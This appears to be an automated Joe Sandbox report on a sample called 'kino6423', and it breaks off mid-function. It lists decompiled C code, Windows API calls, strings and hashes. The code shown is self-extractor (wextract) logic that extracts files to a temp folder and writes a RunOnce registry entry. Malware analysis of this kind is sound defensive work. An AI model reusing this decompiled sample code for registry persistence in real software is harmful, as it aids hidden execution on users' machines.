0x00e52ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,00E56BB0,00E50000,00000000,00000002,0000000A), ref: 00E52C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,00E56BB0,00E50000,00000000,00000002,0000000A), ref: 00E52C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00E52C28
CloseHandle.KERNEL32(00000000,?,?,00E56BB0,00E50000,00000000,00000002,0000000A), ref: 00E52C98

Strings

HeapSetInformation, xrefs: 00E52C22
Kernel32.dll, xrefs: 00E52C13

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 821f80823827af4f67a6dcca1da7a2cd6cb85ad01f3897781b47910729e5a93d
Instruction ID: 37497a24dbed8b69dba8955a1b38f658a49588b847f9e3d22fc4d0bb5e0b3b7b
Opcode Fuzzy Hash: 821f80823827af4f67a6dcca1da7a2cd6cb85ad01f3897781b47910729e5a93d
Instruction Fuzzy Hash: E71106313003019FDB246BB6AD49A6F77999B46397F092D29FE00F3293DA30DC0D8661

Uniqueness

Uniqueness Score: -1.00%

Function 00E56F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E56F40() {

				SetUnhandledExceptionFilter(E00E56EF0); // executed
				return 0;
			}

0x00e56f45
0x00e56f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00E56F45

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b54fd93aa33d7c79601c8c79d383e467af3b117a8a717128a5ae55a32c364b5f
Instruction ID: 181fb9c2b11dabc91565917679d1e6b2e191a257c7dc81fb13060d2305d90d09
Opcode Fuzzy Hash: b54fd93aa33d7c79601c8c79d383e467af3b117a8a717128a5ae55a32c364b5f
Instruction Fuzzy Hash: A39002A42637004B96151B719E1A425B5915B4D603BC56D70A411E5494DF6041485512

Uniqueness

Uniqueness Score: -1.00%

Function 00E5202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00E5202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xe58004; // 0x5ba1a886
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00E56CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00E5171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00E5658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xe59a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xe591e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xe591e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xe591e5);
						if(_t90 != 0) {
							 *0xe58580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E00E5171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00E544B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00E5658A( &_v268, 0x104, 0xe51140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0xe58530 = _t66;
				goto L23;
			}

0x00e5202a
0x00e52035
0x00e5203c
0x00e52041
0x00e52050
0x00e5205f
0x00e52064
0x00e5206f
0x00e5208c
0x00e52094
0x00e52257
0x00e52266
0x00e52266
0x00e5209a
0x00e5209b
0x00e5209d
0x00e520aa
0x00e520af
0x00e520c9
0x00e520d1
0x00000000
0x00000000
0x00e520d3
0x00e520da
0x00000000
0x00000000
0x00000000
0x00e520da
0x00e520e2
0x00e52103
0x00e5210e
0x00e52116
0x00e52122
0x00e52128
0x00e5212c
0x00e52179
0x00e52194
0x00e521de
0x00e521e4
0x00e52256
0x00e52256
0x00000000
0x00e52256
0x00e52196
0x00e52196
0x00e5219c
0x00e5219f
0x00e5219f
0x00e521a1
0x00e521a2
0x00e521a6
0x00e521a8
0x00e521b0
0x00e521b0
0x00e521b2
0x00e521b3
0x00e521bc
0x00e521c7
0x00e521cb
0x00e521f1
0x00e521f6
0x00e521fd
0x00e521ff
0x00e521ff
0x00e52204
0x00e52213
0x00e52218
0x00e5221d
0x00e5221d
0x00e52220
0x00e52220
0x00e52222
0x00e52223
0x00e52229
0x00e5223d
0x00e52249
0x00e52250
0x00000000
0x00e52250
0x00e521d2
0x00e521d9
0x00000000
0x00e521d9
0x00e5213a
0x00e52141
0x00e52144
0x00e5214c
0x00000000
0x00000000
0x00e52163
0x00e52172
0x00e52172
0x00000000
0x00e52163
0x00e520ea
0x00e520f0
0x00000000

APIs

memset.MSVCRT ref: 00E52050
memset.MSVCRT ref: 00E5205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00E5208C

Part of subcall function 00E5171E: _vsnprintf.MSVCRT ref: 00E51750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E520C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E520EA
GetSystemDirectoryA.KERNEL32 ref: 00E52103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E52122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00E52134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E52144
GetSystemDirectoryA.KERNEL32 ref: 00E5215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E5218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E521C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E521E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00E5223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E52249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E52250

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00E521F6
DelNodeRunDLL32, xrefs: 00E5212E
advpack.dll, xrefs: 00E52109
wextract_cleanup2, xrefs: 00E520A5, 00E520BE, 00E520F0, 00E52232
%s /D:%s, xrefs: 00E521FF, 00E52210
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00E52082
wextract_cleanup%d, xrefs: 00E5209E
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E521A8, 00E52204

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
API String ID: 178549006-2663108224
Opcode ID: 777a89f995b30e19c86aeac7e7cef4aefd24b0e5546b00d9b96affcd863e3845
Instruction ID: b62216971170d50343c4658856f3cd08f65722373e69863e60436519bb88249a
Opcode Fuzzy Hash: 777a89f995b30e19c86aeac7e7cef4aefd24b0e5546b00d9b96affcd863e3845
Instruction Fuzzy Hash: 78511275A01314AFDB249F21DC49FEB7B68EB45702F041AA8FE45F7191EA708D4D8A60

Uniqueness

Uniqueness Score: -1.00%

Function 00E555A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00E555A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xe58004; // 0x5ba1a886
				_v8 = _t28 ^ _t110;
				_t2 = E00E5468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00E5468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xe59a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xe58b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xe58a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00E56517(_t82, 0x7d2, 0, E00E53210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xe59a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xe591e4;
									_t40 = GetTempPathA(0x104, 0xe591e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00E51781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00E56952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00E5597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00E52630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00E5658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xe591e4;
																					E00E51781(0xe591e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00E55467(0xe591e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00E52630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00E5597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00E55467(0xe591e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xe591e4;
											_t70 = E00E52630(0, 0xe591e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xe591e4;
												_t71 = E00E55467(0xe591e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00E5597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xe58b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00E55467(0xe58b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00E544B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00E544B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xe59124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00E544B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xe59124 = E00E56285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00E56CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x00e555ab
0x00e555b2
0x00e555c9
0x00e555d5
0x00e555d9
0x00e55600
0x00e55605
0x00e5560a
0x00e5560c
0x00e55638
0x00e55641
0x00e55643
0x00e55645
0x00e55645
0x00e5564c
0x00e55652
0x00e55657
0x00e55659
0x00e55696
0x00e5569c
0x00e5589f
0x00e558a7
0x00e558ac
0x00e558b3
0x00e558b5
0x00e556a2
0x00e556a2
0x00e556a8
0x00000000
0x00e556ae
0x00e556ae
0x00e556b9
0x00e556bf
0x00e556c1
0x00e556f3
0x00e556f3
0x00e55705
0x00e5570a
0x00e55711
0x00e55717
0x00e55724
0x00e55726
0x00e55729
0x00e55730
0x00e55737
0x00e5573d
0x00e55740
0x00000000
0x00000000
0x00000000
0x00000000
0x00e5572b
0x00e5572b
0x00e5572e
0x00e55742
0x00e55742
0x00e55745
0x00e5576b
0x00e5576b
0x00000000
0x00e55747
0x00e55747
0x00e5574d
0x00e5574f
0x00e55771
0x00e55771
0x00e55773
0x00000000
0x00e55751
0x00e55751
0x00e55753
0x00000000
0x00e55755
0x00e5575b
0x00e55760
0x00e55762
0x00000000
0x00e55764
0x00e55764
0x00e55769
0x00e5577e
0x00e5577e
0x00e55781
0x00e55788
0x00e5578d
0x00e5578f
0x00e557b2
0x00e557b8
0x00e557bd
0x00e557bf
0x00e557cd
0x00e557cd
0x00e557dd
0x00e557e3
0x00e557ef
0x00e557f5
0x00e557f8
0x00e5580a
0x00e5580a
0x00e557fa
0x00e55802
0x00e55802
0x00e5580d
0x00e5580f
0x00e55830
0x00e55836
0x00e5583d
0x00e5584b
0x00e55851
0x00e55855
0x00e5585a
0x00e5585c
0x00000000
0x00e5585e
0x00e5585e
0x00000000
0x00e5585e
0x00e55811
0x00e55817
0x00e55819
0x00e5581f
0x00000000
0x00e5581f
0x00e55791
0x00e55797
0x00e5579c
0x00e5579e
0x00000000
0x00e557a0
0x00e557a9
0x00e557ae
0x00e557b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00e557b0
0x00e5579e
0x00000000
0x00000000
0x00000000
0x00e55769
0x00e55762
0x00e55753
0x00e5574f
0x00000000
0x00000000
0x00000000
0x00e5572e
0x00000000
0x00e55864
0x00e55864
0x00e55864
0x00e55717
0x00000000
0x00e556c3
0x00e556c5
0x00e556c9
0x00e556ce
0x00e556d0
0x00000000
0x00e556d6
0x00e556d6
0x00e556d8
0x00e556dd
0x00e556df
0x00000000
0x00e556e1
0x00e556e2
0x00e556e4
0x00e556e6
0x00e556eb
0x00e556ed
0x00000000
0x00e556f3
0x00e556f3
0x00000000
0x00e5586c
0x00e55878
0x00e5587e
0x00e55882
0x00e55883
0x00e55889
0x00e5588e
0x00e5588e
0x00000000
0x00e55896
0x00e556ed
0x00e556df
0x00e556d0
0x00e556c1
0x00e556a8
0x00e5565b
0x00e5565b
0x00e5565d
0x00e55669
0x00e55669
0x00e5565f
0x00e5565f
0x00e55665
0x00e55667
0x00000000
0x00000000
0x00e55667
0x00e5566c
0x00e55673
0x00e55678
0x00e5567a
0x00e5589b
0x00e5589b
0x00e55680
0x00e55685
0x00e5568c
0x00000000
0x00e5568c
0x00e5567a
0x00e5560e
0x00e55613
0x00e5561a
0x00e55620
0x00e55626
0x00000000
0x00e55626
0x00e555db
0x00e555e0
0x00e555e7
0x00e555f1
0x00e555f6
0x00e555f6
0x00e555f6
0x00e558b7
0x00e558c7

APIs

Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546A0
Part of subcall function 00E5468F: SizeofResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546A9
Part of subcall function 00E5468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E546C3
Part of subcall function 00E5468F: LoadResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546CC
Part of subcall function 00E5468F: LockResource.KERNEL32(00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546D3
Part of subcall function 00E5468F: memcpy_s.MSVCRT ref: 00E546E5
Part of subcall function 00E5468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00E555CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00E55638
LocalFree.KERNEL32(00000000), ref: 00E5564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E55620

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Part of subcall function 00E56285: GetLastError.KERNEL32(00E55BBC), ref: 00E56285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00E556B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00E5571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00E55737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00E557CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00E557EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00E55802

Part of subcall function 00E52630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00E52654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00E55830

Part of subcall function 00E56517: FindResourceA.KERNEL32(00E50000,000007D6,00000005), ref: 00E5652A
Part of subcall function 00E56517: LoadResource.KERNEL32(00E50000,00000000,?,?,00E52EE8,00000000,00E519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E56538
Part of subcall function 00E56517: DialogBoxIndirectParamA.USER32(00E50000,00000000,00000547,00E519E0,00000000), ref: 00E56557
Part of subcall function 00E56517: FreeResource.KERNEL32(00000000,?,?,00E52EE8,00000000,00E519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E56560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00E55878

Part of subcall function 00E5597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E559A8
Part of subcall function 00E5597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00E559AF

Strings

Z, xrefs: 00E5570A
msdownld.tmp, xrefs: 00E557D3
A:\, xrefs: 00E556F4
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E556AE, 00E556B3, 00E5583D
<None>, xrefs: 00E55632
RUNPROGRAM, xrefs: 00E555BD, 00E55600

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-3708386018
Opcode ID: 00495128c62c9b55cc6bfb33965217b63b6befae3f40129d3c5459bd00daae3a
Instruction ID: 8130512bab639a168ee7f354a15e3e2977a0db410fea68d31badcab48c60c5cf
Opcode Fuzzy Hash: 00495128c62c9b55cc6bfb33965217b63b6befae3f40129d3c5459bd00daae3a
Instruction Fuzzy Hash: 0E812D72A04A049BDB285B318C61BEA72AD9F65307F042D76FD86F2191DE708DCD8A50

Uniqueness

Uniqueness Score: -1.00%

Function 00E5597D Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00E5597D(CHAR* __ecx, signed char __edx, void* __edi, char _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xe58004; // 0x5ba1a886
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xe59124 = E00E56285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00E544B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
